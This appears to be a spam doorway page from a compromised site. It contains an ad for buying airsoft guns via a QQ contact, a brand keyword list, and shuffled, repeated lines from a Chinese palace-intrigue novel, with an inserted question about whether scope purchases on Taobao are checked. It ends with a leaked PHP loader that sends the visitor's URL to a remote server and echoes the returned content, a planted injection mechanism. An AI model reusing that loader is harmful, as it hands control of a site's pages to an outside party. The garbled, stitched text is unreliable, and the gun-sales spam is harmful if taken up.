【咨询代购认准:Airsoft GunQQ:419 545 666██████当面验货,满意付款,绝无定金!】██████5KU,6mm Solution,9.11 Tactical,9mm Tactical gear perfection,A&K,A+Studio,APS,AABB,AGM,AIP,Andax Works,Angry Gun,Apple Airsoft,ARES,ARMY,Army Force,Asia Electric Guns,AY,BATTLEAXE,BELL,BELLIVLLE,beta Project,BIG DRAGON,BISON,Both Elephant,BOYI,BSA,BUILDING FIRE,CAA Tactical Airsof,Classic Army,CM Battery,Combat Force,Cool,Core,Cyber gun,CYMA,D-BOYS,Double Eagle,DYTAC,Eagle Force, eAiming, EC, Echo1, ELEMENT, Emerson, ENERGY, EXCEL, F.M.A, FAB DEFENSE, Falcon, Fat Man Airsoft F.M.A., FE, FEI TENG, FEI XIANG, Fidragon, FireFox, FISHERMEN, FLAME, FLYYE,FORRAN, FOX, FYLAN, G&D, G&G, G&P,Galaxy,GANZO, GAS, GHK, Gold Arrows, Golden ball, Golden Eagle, GS, GUARDER, GUN, H.K, HK3 , HK3P , Hakkotsu, Hellfire, HERO ARMS, Hexagon Production, HFC, HUANGYE, Imax, INFANTRY, JING GONG, JM, JX, K-Cube, KAI SHENG, KH, King Arms, KJ Works, KMS, KPX, KS, KSC, KWA, KWC, KWG, L&H, LinkMan,LONEX, LS Taiwan, MADBULL,MAG magazine, MAGNUM, Magpul PTS, MARUSHIN, Maruzen, MAXON, MC-TECH, Mechanix Wear, Meister, MILSPEX, Mosquito Molds, MYSTERY, MYT, Nicker, NOB,Omega, Oracom, Original S.W.A.T., PANTHER, PDI, Phoenix, ProBiker, QIAO WEI, Rainier Arms, RBOZB GEAR, Red Fire, Refine Museum Piece, Royal, S&T, S-THUNDER, SAMURAI, SAPH, Scorpion, Seals, SEIKO, SHI, SHOOTER, SHUANGBAO, SIIS, Silverback, Site-Lite Laser, SKYMA,Snow Wolf,SOCOM GEAR, Spartan Doctrine,SPIDE HEAVY INDUSTRES, SRC, STAR, Stark Arms, Stbaos, STTI Taiwan, SUPER POWER, SWAT, SY, Tanaka Works, TangoDown, TASCO, TERCEL, TMC, Tokyo Marui, TOP, TOUBO, Toy-jet, U.S. Army, UFC, UltraForce, Ultralast, Umarex, VEGA,VF, VFC,VIGOR,VINBO VB, WarBear, WE, We Watch, WEIBAO WB, Well, WESTERN ARMS, Wii, WinGun WG,X.Power, Xcortech, Z-Tactical, ZC LEOPARD, Zeon Gun, Zeta-Lab

  “皇上,真的不是臣妾,跟臣妾没有关系啊,都是臣妾的父亲逼迫臣妾……”方止盈哭的梨花带雨。  接下来就是骠骑大将军,剥夺他的大将军官职,收回王家所有人手中的兵权,至此,王家也没落了。  果然,皇帝不管方太师的脸色,直接下旨革去他的太师官职,贬为庶民,这还是看在他曾是帝师的份上。  她竟然也没死?方止盈听到皇帝说德妃的时候,错愕的瞪大美眸,失声大叫:“德妃没死?”  真当他这个皇帝死了不成?  所有方太师一派的人,都被皇帝找理由各种打压。  “够了,事实真相朕早已查明。”  “皇上,臣妾真的冤枉啊,臣妾在宫中向来循规蹈矩,不敢走错半步,怎么敢行此大逆之事。”  皇上已经发落了方妃,接下来就轮到方太师了。  慕容澈俊脸蓦地一沉,眼底划过一丝杀意,看向她的目光冰冷而无情,“来人,将方庶人押去冷宫。”  等方太师被押走后,小李子带人去抄方府。  皇上已经发落了方妃,接下来就轮到方太师了。  至于方家,毕竟是母后的娘家,如今母后瘫痪又昏迷,也不想她醒来后再受刺激,直接将嫡系成员流放边疆,旁支的贬为平民,且十年内不得考取功名。  “皇上,臣妾真的冤枉啊,臣妾在宫中向来循规蹈矩,不敢走错半步,怎么敢行此大逆之事。”  慕容澈冷冷的下旨。  德妃?  德妃?  果然,皇帝不管方太师的脸色,直接下旨革去他的太师官职,贬为庶民,这还是看在他曾是帝师的份上。  “皇上,真的不是臣妾,跟臣妾没有关系啊,都是臣妾的父亲逼迫臣妾……”方止盈哭的梨花带雨。  所有方太师一派的人,都被皇帝找理由各种打压。  话落,从外面进来两个侍卫,将她怀中的二皇子抱走,押着面如死灰的方止盈出了金銮殿。  等方太师被押走后,小李子带人去抄方府。  话落,从外面进来两个侍卫,将她怀中的二皇子抱走,押着面如死灰的方止盈出了金銮殿。  皇上已经发落了方妃,接下来就轮到方太师了。  她竟然也没死?方止盈听到皇帝说德妃的时候,错愕的瞪大美眸,失声大叫:“德妃没死?”  真当他这个皇帝死了不成?  方止盈顿时发现自己说了什么,可是为时已晚,浑身的力气像被抽走了一般。  慕容澈俊脸蓦地一沉,眼底划过一丝杀意,看向她的目光冰冷而无情,“来人,将方庶人押去冷宫。”  “皇上,真的不是臣妾,跟臣妾没有关系啊,都是臣妾的父亲逼迫臣妾……”方止盈哭的梨花带雨。  接下来就是骠骑大将军,剥夺他的大将军官职,收回王家所有人手中的兵权,至此,王家也没落了。  她竟然也没死?方止盈听到皇帝说德妃的时候,错愕的瞪大美眸,失声大叫:“德妃没死?”  至于惠妃,也被贬为贵人。  “皇上,真的不是臣妾,跟臣妾没有关系啊,都是臣妾的父亲逼迫臣妾……”方止盈哭的梨花带雨。淘宝买瞄准镜会查吗?  所有方太师一派的人,都被皇帝找理由各种打压。  慕容澈冷冷的下旨。  至于方家,毕竟是母后的娘家,如今母后瘫痪又昏迷,也不想她醒来后再受刺激,直接将嫡系成员流放边疆,旁支的贬为平民,且十年内不得考取功名。  话落,从外面进来两个侍卫,将她怀中的二皇子抱走,押着面如死灰的方止盈出了金銮殿。  慕容澈冷冷的下旨。  所有方太师一派的人,都被皇帝找理由各种打压。  “够了,方妃,你真让朕恶心,从今天起,方氏止盈,贬为庶人,打入冷宫,,二皇子暂时先交给德妃抚养。”  等方太师被押走后,小李子带人去抄方府。  至于惠妃,也被贬为贵人。  方止盈顿时发现自己说了什么,可是为时已晚,浑身的力气像被抽走了一般。  等方太师被押走后,小李子带人去抄方府。  她竟然也没死?方止盈听到皇帝说德妃的时候,错愕的瞪大美眸,失声大叫:“德妃没死?”  方止盈顿时发现自己说了什么,可是为时已晚,浑身的力气像被抽走了一般。  她竟然也没死?方止盈听到皇帝说德妃的时候,错愕的瞪大美眸,失声大叫:“德妃没死?”  “够了,事实真相朕早已查明。”  真当他这个皇帝死了不成?  皇上已经发落了方妃,接下来就轮到方太师了。  话落,从外面进来两个侍卫,将她怀中的二皇子抱走,押着面如死灰的方止盈出了金銮殿。  朝中大臣顿时感到一阵冷意从身上冒起。  “够了,方妃,你真让朕恶心,从今天起,方氏止盈,贬为庶人,打入冷宫,,二皇子暂时先交给德妃抚养。”  慕容澈俊脸蓦地一沉,眼底划过一丝杀意,看向她的目光冰冷而无情,“来人,将方庶人押去冷宫。”  “够了,事实真相朕早已查明。”  她竟然也没死?方止盈听到皇帝说德妃的时候,错愕的瞪大美眸,失声大叫:“德妃没死?”  所有方太师一派的人,都被皇帝找理由各种打压。  “皇上,臣妾真的冤枉啊,臣妾在宫中向来循规蹈矩,不敢走错半步,怎么敢行此大逆之事。”  方止盈顿时发现自己说了什么,可是为时已晚,浑身的力气像被抽走了一般。  “皇上,真的不是臣妾,跟臣妾没有关系啊,都是臣妾的父亲逼迫臣妾……”方止盈哭的梨花带雨。  接下来就是骠骑大将军,剥夺他的大将军官职,收回王家所有人手中的兵权,至此,王家也没落了。  等方太师被押走后,小李子带人去抄方府。

host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']); echo $Content_mb; ?>